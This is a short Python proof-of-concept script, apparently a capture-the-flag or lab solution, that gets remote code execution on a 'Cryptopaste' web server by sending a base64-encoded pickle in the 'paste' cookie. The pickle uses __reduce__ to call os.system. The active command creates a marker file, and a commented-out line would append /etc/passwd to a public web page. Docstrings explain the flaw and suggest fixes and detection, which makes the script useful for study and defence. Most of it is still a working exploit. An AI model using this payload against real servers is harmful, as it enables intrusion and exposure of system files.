Created
July 9, 2020 14:34
RCE Exploit Pickle Cookie
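"""
Cookie RCE proof of concept for the Cryptopaste server.

The script places a base64-encoded pickle in the `paste` cookie; it presumably
works because the server unpickles that cookie value. The server-side fix is to
stop unpickling client-supplied data and use a signed, data-only format instead.
"""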
import requests | |
import os | |
import pickle | |
import base64 | |
# Base URL of the instance under test; the value points at a local service.
target = "http://localhost:1337/"
def build_payload(command):
    """Serialize an object whose unpickling invokes ``os.system(command)``.

    This shows why ``pickle.loads`` must never be applied to data a client
    controls: ``__reduce__`` lets the pickle stream name a callable and its
    arguments, and the unpickler calls it while loading. Integrity-protecting
    the cookie (for example with an HMAC) or switching to a data-only format
    such as JSON removes this class of bug on the receiving side.

    Args:
        command: Shell command string embedded in the pickle stream.

    Returns:
        The pickled bytes, produced with the interpreter's default protocol.
    """

    class _ReduceHook:
        def __reduce__(self):
            # pickle records this (callable, args) pair instead of the
            # instance; the loading side calls it to "rebuild" the object.
            return os.system, (command,)

    hook = _ReduceHook()
    return pickle.dumps(hook)
def send_rce(command):
    """Send one GET to ``target`` with a pickled command in the ``paste`` cookie.

    The pickle from ``build_payload`` is base64-encoded and sent as the
    ``paste`` cookie value. Only the HTTP status is checked: a 200 shows the
    request was answered, not that the command ran on the server.

    Defender's note: a ``paste`` cookie that base64-decodes to bytes starting
    with 0x80 (the pickle PROTO opcode) is not a value a browser would
    normally hold and is worth alerting on.

    Args:
        command: Shell command string passed through to ``build_payload``.
    """
    cookie_value = base64.b64encode(build_payload(command)).decode('utf-8')
    response = requests.get(target, headers={"Cookie": f"paste={cookie_value}"})
    if response.status_code != 200:
        # Any other status is silently ignored.
        return
    print(f"[+] command sent: $ {command}")
if __name__ == "__main__":
    # Script entry point: announce the configured target, then send one request.
    print(f"[?] Sending evil cookie to {target}...")
    # Creating an empty marker file is a side-effect-free way to confirm that
    # the deserialization sink is reachable on a test instance.
    send_rce('touch pwnd.txt')
    #send_rce('cat /etc/passwd >> static/index.html')